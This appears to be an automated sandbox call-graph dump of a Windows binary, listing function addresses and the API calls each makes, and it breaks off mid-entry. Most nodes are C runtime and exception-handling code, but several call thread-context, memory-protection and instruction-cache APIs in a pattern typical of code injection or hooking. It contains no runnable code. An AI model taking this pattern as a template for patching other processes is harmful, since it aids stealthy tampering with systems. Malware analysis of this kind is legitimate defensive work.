_CallSETranslator 9 API calls 8510->8513 8512 1f5a9688f9b 8511->8512 8514 1f5a9689224 _CallSETranslator 9 API calls 8512->8514 8513->8509 8515 1f5a9688fa8 8514->8515 8516 1f5a968c248 23 API calls 8515->8516 8517 1f5a9688fb1 8516->8517 8518 1f5a968c248 23 API calls 8517->8518 8519 1f5a9688fbd 8518->8519 8924 1f5a9682438 GetProcessIdOfThread GetCurrentProcessId 8925 1f5a96824de 8924->8925 8926 1f5a9682463 CreateFileW 8924->8926 8926->8925 8927 1f5a9682497 WriteFile ReadFile CloseHandle 8926->8927 8927->8925 8928 1f5a968d63c 8929 1f5a968d661 8928->8929 8938 1f5a968d678 8928->8938 8930 1f5a968d24c __free_lconv_mon 11 API calls 8929->8930 8931 1f5a968d666 8930->8931 8933 1f5a968d110 _invalid_parameter_noinfo 49 API calls 8931->8933 8932 1f5a968d730 8935 1f5a968ba9c 11 API calls 8932->8935 8934 1f5a968d671 8933->8934 8936 1f5a968d788 8935->8936 8937 1f5a968d790 8936->8937 8948 1f5a968d7c2 8936->8948 8940 1f5a968d2e4 __free_lconv_mon 11 API calls 8937->8940 8938->8932 8943 1f5a968d708 8938->8943 8945 1f5a968d6c5 8938->8945 8960 1f5a968d880 8938->8960 8942 1f5a968d797 8940->8942 8941 1f5a968d821 8944 1f5a968d2e4 __free_lconv_mon 11 API calls 8941->8944 8946 1f5a968d6e8 8942->8946 8949 1f5a968d2e4 __free_lconv_mon 11 API calls 8942->8949 8943->8946 8950 1f5a968d2e4 __free_lconv_mon 11 API calls 8943->8950 8947 1f5a968d82c 8944->8947 8945->8946 8953 1f5a968d2e4 __free_lconv_mon 11 API calls 8945->8953 8952 1f5a968d2e4 __free_lconv_mon 11 API calls 8946->8952 8951 1f5a968d845 8947->8951 8955 1f5a968d2e4 __free_lconv_mon 11 API calls 8947->8955 8948->8941 8948->8948 8957 1f5a968d867 8948->8957 8982 1f5a9690af0 8948->8982 8949->8942 8950->8943 8956 1f5a968d2e4 __free_lconv_mon 11 API calls 8951->8956 8952->8934 8953->8945 8955->8947 8956->8934 8958 1f5a968d130 _invalid_parameter_noinfo 17 API calls 8957->8958 8959 1f5a968d87c 8958->8959 8961 1f5a968d8ae 8960->8961 8961->8961 8962 1f5a968d26c __free_lconv_mon 11 API calls 8961->8962 8963 1f5a968d8f9 8962->8963 8964 1f5a9690af0 49 API calls 8963->8964 8965 1f5a968d92f 8964->8965 8966 1f5a968d130 _invalid_parameter_noinfo 17 API calls 8965->8966 8967 1f5a968da03 8966->8967 8968 1f5a968dd54 23 API calls 8967->8968 8969 1f5a968dae6 8968->8969 8970 1f5a968f148 5 API calls 8969->8970 8971 1f5a968db11 8970->8971 8991 1f5a968d334 8971->8991 8974 1f5a968dbad 8975 1f5a968dd54 23 API calls 8974->8975 8976 1f5a968dbdd 8975->8976 8977 1f5a968f148 5 API calls 8976->8977 8978 1f5a968dc06 8977->8978 9013 1f5a968d4b0 8978->9013 8981 1f5a968d880 59 API calls 8987 1f5a9690b0d 8982->8987 8983 1f5a9690b12 8984 1f5a9690b28 8983->8984 8985 1f5a968d24c __free_lconv_mon 11 API calls 8983->8985 8984->8948 8986 1f5a9690b1c 8985->8986 8988 1f5a968d110 _invalid_parameter_noinfo 49 API calls 8986->8988 8987->8983 8987->8984 8989 1f5a9690b5c 8987->8989 8988->8984 8989->8984 8990 1f5a968d24c __free_lconv_mon 11 API calls 8989->8990 8990->8986 8992 1f5a968d35e 8991->8992 8993 1f5a968d382 8991->8993 8994 1f5a968d36d FindFirstFileExW 8992->8994 8998 1f5a968d2e4 __free_lconv_mon 11 API calls 8992->8998 8995 1f5a968d387 8993->8995 8996 1f5a968d3dc 8993->8996 8994->8974 8995->8994 9001 1f5a968d2e4 __free_lconv_mon 11 API calls 8995->9001 9005 1f5a968d39c 8995->9005 8997 1f5a968ec1c MultiByteToWideChar 8996->8997 9000 1f5a968d3f8 8997->9000 8998->8994 8999 1f5a968d3ff GetLastError 9003 1f5a968d1c0 11 API calls 8999->9003 9000->8999 9004 1f5a968d43a 9000->9004 9008 1f5a968d42d 9000->9008 9011 1f5a968d2e4 __free_lconv_mon 11 API calls 9000->9011 9001->9005 9002 1f5a968c5ac 12 API calls 9002->8994 9007 1f5a968d40c 9003->9007 9004->8994 9006 1f5a968ec1c MultiByteToWideChar 9004->9006 9005->9002 9009 1f5a968d47e 9006->9009 9010 1f5a968d24c __free_lconv_mon 11 API calls 9007->9010 9012 1f5a968c5ac 12 API calls 9008->9012 9009->8994 9009->8999 9010->8994 9011->9008 9012->9004 9014 1f5a968d4fe 9013->9014 9015 1f5a968d4da 9013->9015 9016 1f5a968d504 9014->9016 9017 1f5a968d558 9014->9017 9019 1f5a968d2e4 __free_lconv_mon 11 API calls 9015->9019 9022 1f5a968d4e9 9015->9022 9020 1f5a968d519 9016->9020 9016->9022 9023 1f5a968d2e4 __free_lconv_mon 11 API calls 9016->9023 9018 1f5a968ecac WideCharToMultiByte 9017->9018 9030 1f5a968d57c 9018->9030 9019->9022 9024 1f5a968c5ac 12 API calls 9020->9024 9021 1f5a968d583 GetLastError 9025 1f5a968d1c0 11 API calls 9021->9025 9022->8981 9023->9020 9024->9022 9028 1f5a968d590 9025->9028 9026 1f5a968d5c0 9026->9022 9027 1f5a968ecac WideCharToMultiByte 9026->9027 9031 1f5a968d60c 9027->9031 9032 1f5a968d24c __free_lconv_mon 11 API calls 9028->9032 9029 1f5a968d5b4 9034 1f5a968c5ac 12 API calls 9029->9034 9030->9021 9030->9026 9030->9029 9033 1f5a968d2e4 __free_lconv_mon 11 API calls 9030->9033 9031->9021 9031->9022 9032->9022 9033->9029 9034->9026 8520 1f5a96953ce 8521 1f5a9689224 _CallSETranslator 9 API calls 8520->8521 8522 1f5a96953dc 8521->8522 8523 1f5a96953e7 8522->8523 8524 1f5a9689224 _CallSETranslator 9 API calls 8522->8524 8524->8523 8525 1f5a968f3d0 GetProcessHeap 8329 1f5a9682d50 8331 1f5a9682dad 8329->8331 8330 1f5a9682dc8 8331->8330 8332 1f5a9683684 3 API calls 8331->8332 8332->8330 8526 1f5a96951cf 8527 1f5a96951e7 8526->8527 8533 1f5a9695252 8526->8533 8528 1f5a9689224 _CallSETranslator 9 API calls 8527->8528 8527->8533 8529 1f5a9695234 8528->8529 8530 1f5a9689224 _CallSETranslator 9 API calls 8529->8530 8531 1f5a9695249 8530->8531 8532 1f5a968c248 23 API calls 8531->8532 8532->8533 7605 1f5a968c0d4 7608 1f5a968be84 7605->7608 7615 1f5a968be4c 7608->7615 7616 1f5a968be61 7615->7616 7617 1f5a968be5c 7615->7617 7619 1f5a968be68 7616->7619 7618 1f5a968be08 11 API calls 7617->7618 7618->7616 7620 1f5a968be7d 7619->7620 7621 1f5a968be78 7619->7621 7623 1f5a968be08 7620->7623 7622 1f5a968be08 11 API calls 7621->7622 7622->7620 7624 1f5a968be0d 7623->7624 7625 1f5a968be3e 7623->7625 7626 1f5a968be36 7624->7626 7629 1f5a968d2e4 7624->7629 7628 1f5a968d2e4 __free_lconv_mon 11 API calls 7626->7628 7628->7625 7630 1f5a968d31a 7629->7630 7631 1f5a968d2e9 HeapFree 7629->7631 7630->7624 7631->7630 7632 1f5a968d304 GetLastError 7631->7632 7633 1f5a968d311 __free_lconv_mon 7632->7633 7635 1f5a968d24c 7633->7635 7638 1f5a968cb40 GetLastError 7635->7638 7637 1f5a968d255 7637->7630 7639 1f5a968cb81 FlsSetValue 7638->7639 7644 1f5a968cb64 7638->7644 7640 1f5a968cb71 SetLastError 7639->7640 7641 1f5a968cb93 7639->7641 7640->7637 7655 1f5a968d26c 7641->7655 7644->7639 7644->7640 7646 1f5a968cbc0 FlsSetValue 7649 1f5a968cbde 7646->7649 7650 1f5a968cbcc FlsSetValue 7646->7650 7647 1f5a968cbb0 FlsSetValue 7648 1f5a968cbb9 7647->7648 7652 1f5a968d2e4 __free_lconv_mon 5 API calls 7648->7652 7662 1f5a968c734 7649->7662 7650->7648 7652->7640 7660 1f5a968d27d __free_lconv_mon 7655->7660 7656 1f5a968d2ce 7659 1f5a968d24c __free_lconv_mon 10 API calls 7656->7659 7657 1f5a968d2b2 HeapAlloc 7658 1f5a968cba2 7657->7658 7657->7660 7658->7646 7658->7647 7659->7658 7660->7656 7660->7657 7667 1f5a968b3fc 7660->7667 7676 1f5a968c60c 7662->7676 7670 1f5a968b43c 7667->7670 7675 1f5a968c53c EnterCriticalSection 7670->7675 7688 1f5a968c53c EnterCriticalSection 7676->7688 8534 1f5a968afd4 8541 1f5a968af07 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8534->8541 8535 1f5a968affb 8536 1f5a9689224 _CallSETranslator 9 API calls 8535->8536 8537 1f5a968b000 8536->8537 8538 1f5a9689224 _CallSETranslator 9 API calls 8537->8538 8540 1f5a968b00b __FrameHandler3::GetHandlerSearchState 8537->8540 8538->8540 8539 1f5a96898cc 9 API calls Is_bad_exception_allowed 8539->8541 8541->8535 8541->8539 8541->8540 8543 1f5a96898f4 8541->8543 8544 1f5a9689224 _CallSETranslator 9 API calls 8543->8544 8545 1f5a9689902 8544->8545 8545->8541 7690 1f5a968ccc8 7691 1f5a968ccd8 7690->7691 7692 1f5a968cb40 __free_lconv_mon 11 API calls 7691->7692 7693 1f5a968cce3 __vcrt_uninitialize_ptd 7691->7693 7692->7693 9044 1f5a968ac48 9045 1f5a9689224 _CallSETranslator 9 API calls 9044->9045 9046 1f5a968ac7d 9045->9046 9047 1f5a9689224 _CallSETranslator 9 API calls 9046->9047 9048 1f5a968ac8b __except_validate_context_record 9047->9048 9049 1f5a9689224 _CallSETranslator 9 API calls 9048->9049 9050 1f5a968accf 9049->9050 9051 1f5a9689224 _CallSETranslator 9 API calls 9050->9051 9052 1f5a968acd8 9051->9052 9053 1f5a9689224 _CallSETranslator 9 API calls 9052->9053 9054 1f5a968ace1 9053->9054 9067 1f5a968983c 9054->9067 9057 1f5a9689224 _CallSETranslator 9 API calls 9058 1f5a968ad11 __CxxCallCatchBlock 9057->9058 9059 1f5a9689878 __CxxCallCatchBlock 9 API calls 9058->9059 9063 1f5a968adc2 9059->9063 9060 1f5a968adeb __CxxCallCatchBlock 9061 1f5a9689224 _CallSETranslator 9 API calls 9060->9061 9062 1f5a968adfe 9061->9062 9064 1f5a9689224 _CallSETranslator 9 API calls 9062->9064 9063->9060 9065 1f5a9688ef8 __CxxCallCatchBlock 9 API calls 9063->9065 9066 1f5a968ae07 9064->9066 9065->9060 9068 1f5a9689224 _CallSETranslator 9 API calls 9067->9068 9069 1f5a968984d 9068->9069 9070 1f5a9689858 9069->9070 9071 1f5a9689224 _CallSETranslator 9 API calls 9069->9071 9072 1f5a9689224 _CallSETranslator 9 API calls 9070->9072 9071->9070 9073 1f5a9689869 9072->9073 9073->9057 9073->9058 8546 1f5a9683fc9 8547 1f5a9683f16 8546->8547 8548 1f5a9683f66 VirtualQuery 8547->8548 8549 1f5a9683f80 8547->8549 8550 1f5a9683f9a VirtualAlloc 8547->8550 8548->8547 8548->8549 8550->8549 8551 1f5a9683fcb GetLastError 8550->8551 8551->8547 8552 1f5a9685dc9 8553 1f5a9685dd0 VirtualProtect 8552->8553 8554 1f5a9685ce0 8553->8554 8555 1f5a9685df9 GetLastError 8553->8555 8555->8554 8333 1f5a969314b 8334 1f5a96933f0 8333->8334 8335 1f5a969318b 8333->8335 8336 1f5a96933e6 8334->8336 8340 1f5a9693f00 _log10_special 20 API calls 8334->8340 8335->8334 8337 1f5a96931bf 8335->8337 8338 1f5a96933d2 8335->8338 8341 1f5a9693f00 8338->8341 8340->8336 8344 1f5a9693f20 8341->8344 8345 1f5a9693f3a 8344->8345 8346 1f5a9693f1b 8345->8346 8348 1f5a9693d60 8345->8348 8346->8336 8349 1f5a9693da0 _log10_special 8348->8349 8351 1f5a9693e0c _log10_special 8349->8351 8359 1f5a9694020 8349->8359 8352 1f5a9693e49 8351->8352 8354 1f5a9693e19 8351->8354 8366 1f5a9694350 8352->8366 8362 1f5a9693c3c 8354->8362 8356 1f5a9693e47 _log10_special 8357 1f5a9687e40 _log10_special 8 API calls 8356->8357 8358 1f5a9693e71 8357->8358 8358->8346 8372 1f5a9694048 8359->8372 8363 1f5a9693c80 _log10_special 8362->8363 8364 1f5a9693c95 8363->8364 8365 1f5a9694350 _log10_special 11 API calls 8363->8365 8364->8356 8365->8364 8367 1f5a9694370 8366->8367 8368 1f5a9694359 8366->8368 8369 1f5a968d24c __free_lconv_mon 11 API calls 8367->8369 8370 1f5a9694368 8368->8370 8371 1f5a968d24c __free_lconv_mon 11 API calls 8368->8371 8369->8370 8370->8356 8371->8370 8373 1f5a9694087 _raise_exc _clrfp 8372->8373 8374 1f5a969429c RaiseException 8373->8374 8375 1f5a9694042 8374->8375 8375->8351 7694 1f5a96884a0 7697 1f5a9688fc0 7694->7697 7696 1f5a96884c9 7698 1f5a9689016 __std_exception_destroy 7697->7698 7699 1f5a9688fe1 7697->7699 7698->7696 7699->7698 7701 1f5a968c288 7699->7701 7702 1f5a968c295 7701->7702 7704 1f5a968c29f 7701->7704 7702->7704 7708 1f5a968c2ba 7702->7708 7703 1f5a968d24c __free_lconv_mon 11 API calls 7705 1f5a968c2a6 7703->7705 7704->7703 7710 1f5a968d110 7705->7710 7706 1f5a968c2b2 7706->7698 7708->7706 7709 1f5a968d24c __free_lconv_mon 11 API calls 7708->7709 7709->7705 7713 1f5a968cfa8 7710->7713 7714 1f5a968cfd3 7713->7714 7721 1f5a968d044 7714->7721 7717 1f5a968d01d 7718 1f5a968d032 7717->7718 7720 1f5a968c340 _invalid_parameter_noinfo 28 API calls 7717->7720 7718->7706 7720->7718 7744 1f5a968cd8c 7721->7744 7724 1f5a968cffa 7724->7717 7731 1f5a968c340 7724->7731 7732 1f5a968c34f GetLastError 7731->7732 7733 1f5a968c398 7731->7733 7734 1f5a968c364 7732->7734 7733->7717 7735 1f5a968cc08 _invalid_parameter_noinfo 14 API calls 7734->7735 7736 1f5a968c37e SetLastError 7735->7736 7736->7733 7737 1f5a968c3a1 7736->7737 7738 1f5a968c340 _invalid_parameter_noinfo 26 API calls 7737->7738 7739 1f5a968c3c7 7738->7739 7793 1f5a968ffd0 7739->7793 7745 1f5a968cde3 7744->7745 7746 1f5a968cda8 GetLastError 7744->7746 7745->7724 7750 1f5a968cdf8 7745->7750 7747 1f5a968cdb8 7746->7747 7757 1f5a968cc08 7747->7757 7751 1f5a968ce14 GetLastError SetLastError 7750->7751 7752 1f5a968ce2c 7750->7752 7751->7752 7752->7724 7753 1f5a968d130 IsProcessorFeaturePresent 7752->7753 7754 1f5a968d143 7753->7754 7771 1f5a968ce44 7754->7771 7758 1f5a968cc27 FlsGetValue 7757->7758 7760 1f5a968cc3c 7757->7760 7759 1f5a968cc34 SetLastError 7758->7759 7758->7760 7759->7745 7760->7759 7761 1f5a968d26c __free_lconv_mon 11 API calls 7760->7761 7762 1f5a968cc5e 7761->7762 7763 1f5a968cc7c FlsSetValue 7762->7763 7766 1f5a968cc6c 7762->7766 7764 1f5a968cc88 FlsSetValue 7763->7764 7765 1f5a968cc9a 7763->7765 7764->7766 7767 1f5a968c734 __free_lconv_mon 11 API calls 7765->7767 7768 1f5a968d2e4 __free_lconv_mon 11 API calls 7766->7768 7769 1f5a968cca2 7767->7769 7768->7759 7770 1f5a968d2e4 __free_lconv_mon 11 API calls 7769->7770 7770->7759 7772 1f5a968ce7e _invalid_parameter_noinfo 7771->7772 7773 1f5a968cea6 RtlCaptureContext RtlLookupFunctionEntry 7772->7773 7774 1f5a968cee0 RtlVirtualUnwind 7773->7774 7775 1f5a968cf16 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7773->7775 7774->7775 7776 1f5a968cf68 _invalid_parameter_noinfo 7775->7776 7779 1f5a9687e40 7776->7779 7782 1f5a9687e49 7779->7782 7780 1f5a9688618 IsProcessorFeaturePresent 7783 1f5a9688630 7780->7783 7781 1f5a9687e54 GetCurrentProcess TerminateProcess 7782->7780 7782->7781 7788 1f5a9688810 RtlCaptureContext 7783->7788 7789 1f5a968882a RtlLookupFunctionEntry 7788->7789 7790 1f5a9688840 RtlVirtualUnwind 7789->7790 7791 1f5a9688643 7789->7791 7790->7789 7790->7791 7792 1f5a96885e4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7791->7792 7794 1f5a968c3ef 7793->7794 7795 1f5a968ffe9 7793->7795 7797 1f5a969003c 7794->7797 7795->7794 7801 1f5a96905fc 7795->7801 7798 1f5a9690055 7797->7798 7799 1f5a968c3ff 7797->7799 7798->7799 7847 1f5a968e890 7798->7847 7799->7717 7810 1f5a968c9c8 GetLastError 7801->7810 7803 1f5a969060b 7809 1f5a9690651 7803->7809 7846 1f5a968c53c EnterCriticalSection 7803->7846 7809->7794 7811 1f5a968ca09 FlsSetValue 7810->7811 7812 1f5a968c9ec FlsGetValue 7810->7812 7814 1f5a968ca1b 7811->7814 7827 1f5a968c9f9 7811->7827 7813 1f5a968ca03 7812->7813 7812->7827 7813->7811 7816 1f5a968d26c __free_lconv_mon 11 API calls 7814->7816 7815 1f5a968ca75 SetLastError 7817 1f5a968ca82 7815->7817 7824 1f5a968ca95 7815->7824 7818 1f5a968ca2a 7816->7818 7817->7803 7819 1f5a968ca48 FlsSetValue 7818->7819 7820 1f5a968ca38 FlsSetValue 7818->7820 7822 1f5a968ca54 FlsSetValue 7819->7822 7823 1f5a968ca66 7819->7823 7821 1f5a968ca41 7820->7821 7825 1f5a968d2e4 __free_lconv_mon 11 API calls 7821->7825 7822->7821 7826 1f5a968c734 __free_lconv_mon 11 API calls 7823->7826 7828 1f5a968caad FlsGetValue 7824->7828 7829 1f5a968cac8 FlsSetValue 7824->7829 7825->7827 7830 1f5a968ca6e 7826->7830 7827->7815 7833 1f5a968cac2 7828->7833 7834 1f5a968caba 7828->7834 7832 1f5a968cad5 7829->7832 7829->7834 7831 1f5a968d2e4 __free_lconv_mon 11 API calls 7830->7831 7831->7815 7835 1f5a968d26c __free_lconv_mon 11 API calls 7832->7835 7833->7829 7834->7803 7836 1f5a968cae4 7835->7836 7837 1f5a968cb02 FlsSetValue 7836->7837 7838 1f5a968caf2 FlsSetValue 7836->7838 7839 1f5a968cb0e FlsSetValue 7837->7839 7840 1f5a968cb20 7837->7840 7841 1f5a968cafb 7838->7841 7839->7841 7842 1f5a968c734 __free_lconv_mon 11 API calls 7840->7842 7843 1f5a968d2e4 __free_lconv_mon 11 API calls 7841->7843 7844 1f5a968cb28 7842->7844 7843->7834 7844->7834 7845 1f5a968d2e4 __free_lconv_mon 11 API calls 7844->7845 7845->7834 7848 1f5a968c9c8 _invalid_parameter_noinfo 23 API calls 7847->7848 7849 1f5a968e899 7848->7849 7850 1f5a969549a 7851 1f5a96954b3 7850->7851 7852 1f5a96954a9 7850->7852 7854 1f5a968c590 LeaveCriticalSection 7852->7854 7855 1f5a968ee9c 7856 1f5a968eebe 7855->7856 7857 1f5a968eedb 7855->7857 7856->7857 7859 1f5a968eecc 7856->7859 7858 1f5a968eee5 7857->7858 7864 1f5a9691658 7857->7864 7871 1f5a9691694 7858->7871 7860 1f5a968d24c __free_lconv_mon 11 API calls 7859->7860 7862 1f5a968eed1 7860->7862 7865 1f5a9691661 7864->7865 7866 1f5a969167a HeapSize 7864->7866 7867 1f5a968d24c __free_lconv_mon 11 API calls 7865->7867 7868 1f5a9691666 7867->7868 7869 1f5a968d110 _invalid_parameter_noinfo 49 API calls 7868->7869 7870 1f5a9691671 7869->7870 7870->7858 7872 1f5a96916b3 7871->7872 7873 1f5a96916a9 7871->7873 7875 1f5a96916b8 7872->7875 7882 1f5a96916bf __free_lconv_mon 7872->7882 7883 1f5a968c5ac 7873->7883 7879 1f5a968d2e4 __free_lconv_mon 11 API calls 7875->7879 7876 1f5a96916f2 HeapReAlloc 7878 1f5a96916b1 7876->7878 7876->7882 7877 1f5a96916c5 7880 1f5a968d24c __free_lconv_mon 11 API calls 7877->7880 7878->7862 7879->7878 7880->7878 7881 1f5a968b3fc __free_lconv_mon 2 API calls 7881->7882 7882->7876 7882->7877 7882->7881 7884 1f5a968c5f7 7883->7884 7888 1f5a968c5bb __free_lconv_mon 7883->7888 7886 1f5a968d24c __free_lconv_mon 11 API calls 7884->7886 7885 1f5a968c5de HeapAlloc 7887 1f5a968c5f5 7885->7887 7885->7888 7886->7887 7887->7878 7888->7884 7888->7885 7889 1f5a968b3fc __free_lconv_mon 2 API calls 7888->7889 7889->7888 8556 1f5a9685d9c 8557 1f5a9685da3 8556->8557 8558 1f5a9685dd0 VirtualProtect 8557->8558 8560 1f5a9685ce0 8557->8560 8559 1f5a9685df9 GetLastError 8558->8559 8558->8560 8559->8560 9074 1f5a968801c 9076 1f5a9688040 __scrt_acquire_startup_lock 9074->9076 9075 1f5a968b485 9076->9075 9077 1f5a968cb40 __free_lconv_mon 11 API calls 9076->9077 9078 1f5a968b4ae 9077->9078 8376 1f5a9687d30 8377 1f5a9687d51 8376->8377 8378 1f5a9687d4c 8376->8378 8380 1f5a9687e60 8378->8380 8381 1f5a9687e83 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8380->8381 8382 1f5a9687ef7 8380->8382 8381->8382 8382->8377 8383 1f5a9695332 8384 1f5a9689878 __CxxCallCatchBlock 9 API calls 8383->8384 8388 1f5a9695345 8384->8388 8385 1f5a9695384 __CxxCallCatchBlock 8386 1f5a9689224 _CallSETranslator 9 API calls 8385->8386 8387 1f5a9695398 8386->8387 8389 1f5a9689224 _CallSETranslator 9 API calls 8387->8389 8388->8385 8390 1f5a9688ef8 __CxxCallCatchBlock 9 API calls 8388->8390 8391 1f5a96953a8 8389->8391 8390->8385 8561 1f5a96861b3 8562 1f5a96861c0 8561->8562 8563 1f5a96861cc GetThreadContext 8562->8563 8569 1f5a968632a 8562->8569 8564 1f5a96861f2 8563->8564 8563->8569 8568 1f5a9686219 8564->8568 8564->8569 8565 1f5a968640e 8567 1f5a968642e 8565->8567 8579 1f5a96848f0 8565->8579 8566 1f5a9686351 VirtualProtect FlushInstructionCache 8566->8569 8583 1f5a9685300 GetCurrentProcess 8567->8583 8571 1f5a968629d 8568->8571 8573 1f5a9686276 SetThreadContext 8568->8573 8569->8565 8569->8566 8573->8571 8574 1f5a9686487 8577 1f5a9687e40 _log10_special 8 API calls 8574->8577 8575 1f5a9686447 ResumeThread 8576 1f5a9686433 8575->8576 8576->8574 8576->8575 8578 1f5a96864cf 8577->8578 8581 1f5a968490c 8579->8581 8580 1f5a968496f 8580->8567 8581->8580 8582 1f5a9684922 VirtualFree 8581->8582 8582->8581 8584 1f5a968531c 8583->8584 8585 1f5a9685332 VirtualProtect FlushInstructionCache 8584->8585 8586 1f5a9685363 8584->8586 8585->8584 8586->8576 8392 1f5a968ff28 8393 1f5a968ff33 8392->8393 8401 1f5a9692828 8393->8401 8414 1f5a968c53c EnterCriticalSection 8401->8414 9079 1f5a968f62c 9080 1f5a968f638 9079->9080 9082 1f5a968f65f 9080->9082 9083 1f5a969185c 9080->9083 9084 1f5a9691861 9083->9084 9088 1f5a969189c 9083->9088 9085 1f5a9691882 DeleteCriticalSection 9084->9085 9086 1f5a9691894 9084->9086 9085->9085 9085->9086 9087 1f5a968d2e4 __free_lconv_mon 11 API calls 9086->9087 9087->9088 9088->9080 7890 1f5a9682aac 7892 1f5a9682af2 7890->7892 7891 1f5a9682b58 7892->7891 7894 1f5a9683d58 7892->7894 7895 1f5a9683d7a 7894->7895 7896 1f5a9683d65 StrCmpNIW 7894->7896 7895->7892 7896->7895 8415 1f5a968c12c 8416 1f5a968c15d 8415->8416 8417 1f5a968c145 8415->8417 8417->8416 8418 1f5a968d2e4 __free_lconv_mon 11 API calls 8417->8418 8418->8416 8587 1f5a968a9ac 8588 1f5a968a9d9 __except_validate_context_record 8587->8588 8589 1f5a9689224 _CallSETranslator 9 API calls 8588->8589 8590 1f5a968a9de 8589->8590 8592 1f5a968aa38 8590->8592 8593 1f5a968aac6 8590->8593 8603 1f5a968aa8c 8590->8603 8591 1f5a968aab3 8616 1f5a96894d0 8591->8616 8592->8591 8598 1f5a968aa5a __GetCurrentState 8592->8598 8592->8603 8597 1f5a968aae5 8593->8597 8623 1f5a96898cc 8593->8623 8600 1f5a968ab34 8597->8600 8597->8603 8626 1f5a96898e0 8597->8626 8601 1f5a968abdd 8598->8601 8604 1f5a968aeb8 8598->8604 8600->8603 8629 1f5a968a12c 8600->8629 8605 1f5a96898cc Is_bad_exception_allowed 9 API calls 8604->8605 8606 1f5a968aee7 __GetCurrentState 8605->8606 8607 1f5a9689224 _CallSETranslator 9 API calls 8606->8607 8614 1f5a968af04 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8607->8614 8608 1f5a968affb 8609 1f5a9689224 _CallSETranslator 9 API calls 8608->8609 8610 1f5a968b000 8609->8610 8611 1f5a9689224 _CallSETranslator 9 API calls 8610->8611 8612 1f5a968b00b __FrameHandler3::GetHandlerSearchState 8610->8612 8611->8612 8612->8603 8613 1f5a96898cc 9 API calls Is_bad_exception_allowed 8613->8614 8614->8608 8614->8612 8614->8613 8615 1f5a96898f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8614->8615 8615->8614 8686 1f5a9689534 8616->8686 8618 1f5a96894ef __FrameHandler3::ExecutionInCatch 8690 1f5a9689440 8618->8690 8621 1f5a968aeb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8622 1f5a9689524 8621->8622 8622->8603 8624 1f5a9689224 _CallSETranslator 9 API calls 8623->8624 8625 1f5a96898d5 8624->8625 8625->8597 8627 1f5a9689224 _CallSETranslator 9 API calls 8626->8627 8628 1f5a96898e9 8627->8628 8628->8600 8694 1f5a968b044 8629->8694 8631 1f5a968a5f4 8632 1f5a968a545 8632->8631 8634 1f5a968a543 8632->8634 8747 1f5a968a5fc 8632->8747 8633 1f5a968a273 8633->8632 8660 1f5a968a2ab 8633->8660 8636 1f5a9689224 _CallSETranslator 9 API calls 8634->8636 8640 1f5a968a587 8636->8640 8637 1f5a968a475 8637->8634 8643 1f5a968a492 8637->8643 8645 1f5a96898cc Is_bad_exception_allowed 9 API calls 8637->8645 8638 1f5a9689224 _CallSETranslator 9 API calls 8641 1f5a968a1da 8638->8641 8640->8631 8642 1f5a9687e40 _log10_special 8 API calls 8640->8642 8641->8640 8646 1f5a9689224 _CallSETranslator 9 API calls 8641->8646 8644 1f5a968a59a 8642->8644 8643->8634 8649 1f5a968a4b4 8643->8649 8740 1f5a96894a4 8643->8740 8644->8603 8645->8643 8648 1f5a968a1ea 8646->8648 8650 1f5a9689224 _CallSETranslator 9 API calls 8648->8650 8649->8634 8651 1f5a968a4ca 8649->8651 8683 1f5a968a5d7 8649->8683 8652 1f5a968a1f3 8650->8652 8653 1f5a968a4d5 8651->8653 8656 1f5a96898cc Is_bad_exception_allowed 9 API calls 8651->8656 8705 1f5a968990c 8652->8705 8659 1f5a968b0dc 9 API calls 8653->8659 8654 1f5a9689224 _CallSETranslator 9 API calls 8657 1f5a968a5dd 8654->8657 8656->8653 8661 1f5a9689224 _CallSETranslator 9 API calls 8657->8661 8663 1f5a968a4eb 8659->8663 8660->8637 8670 1f5a96898e0 9 API calls 8660->8670 8719 1f5a968a86c 8660->8719 8733 1f5a968a058 8660->8733 8662 1f5a968a5e6 8661->8662 8665 1f5a968c248 23 API calls 8662->8665 8663->8634 8667 1f5a9689534 __SetUnwindTryBlock RtlLookupFunctionEntry 8663->8667 8664 1f5a9689224 _CallSETranslator 9 API calls 8666 1f5a968a235 8664->8666 8665->8631 8666->8633 8669 1f5a9689224 _CallSETranslator 9 API calls 8666->8669 8668 1f5a968a505 8667->8668 8744 1f5a9689738 RtlUnwindEx 8668->8744 8672 1f5a968a241 8669->8672 8670->8660 8673 1f5a9689224 _CallSETranslator 9 API calls 8672->8673 8675 1f5a968a24a 8673->8675 8708 1f5a968b0dc 8675->8708 8679 1f5a968a25e 8715 1f5a968b1cc 8679->8715 8681 1f5a968a5d1 8682 1f5a968c248 23 API calls 8681->8682 8682->8683 8683->8654 8684 1f5a968a266 __CxxCallCatchBlock std::bad_alloc::bad_alloc 8684->8681 8685 1f5a9689078 Concurrency::cancel_current_task 2 API calls 8684->8685 8685->8681 8689 1f5a9689562 __FrameHandler3::ExecutionInCatch 8686->8689 8687 1f5a96895d4 8687->8618 8688 1f5a968958c RtlLookupFunctionEntry 8688->8689 8689->8687 8689->8688 8691 1f5a9689460 8690->8691 8692 1f5a968948b 8690->8692 8691->8692 8693 1f5a9689224 _CallSETranslator 9 API calls 8691->8693 8692->8621 8693->8691 8695 1f5a968b069 __FrameHandler3::ExecutionInCatch 8694->8695 8696 1f5a9689534 __SetUnwindTryBlock RtlLookupFunctionEntry 8695->8696 8697 1f5a968b07e 8696->8697 8759 1f5a9689cb4 8697->8759 8700 1f5a968b090 __FrameHandler3::GetHandlerSearchState 8762 1f5a9689cec 8700->8762 8701 1f5a968b0b3 8702 1f5a9689cb4 __GetUnwindTryBlock RtlLookupFunctionEntry 8701->8702 8704 1f5a968a18e 8702->8704 8704->8631 8704->8633 8704->8638 8706 1f5a9689224 _CallSETranslator 9 API calls 8705->8706 8707 1f5a968991a 8706->8707 8707->8631 8707->8664 8709 1f5a968b1c3 8708->8709 8711 1f5a968b107 8708->8711 8710 1f5a968a25a 8710->8633 8710->8679 8711->8710 8712 1f5a96898e0 9 API calls 8711->8712 8713 1f5a96898cc Is_bad_exception_allowed 9 API calls 8711->8713 8714 1f5a968a86c 9 API calls 8711->8714 8712->8711 8713->8711 8714->8711 8716 1f5a968b239 8715->8716 8717 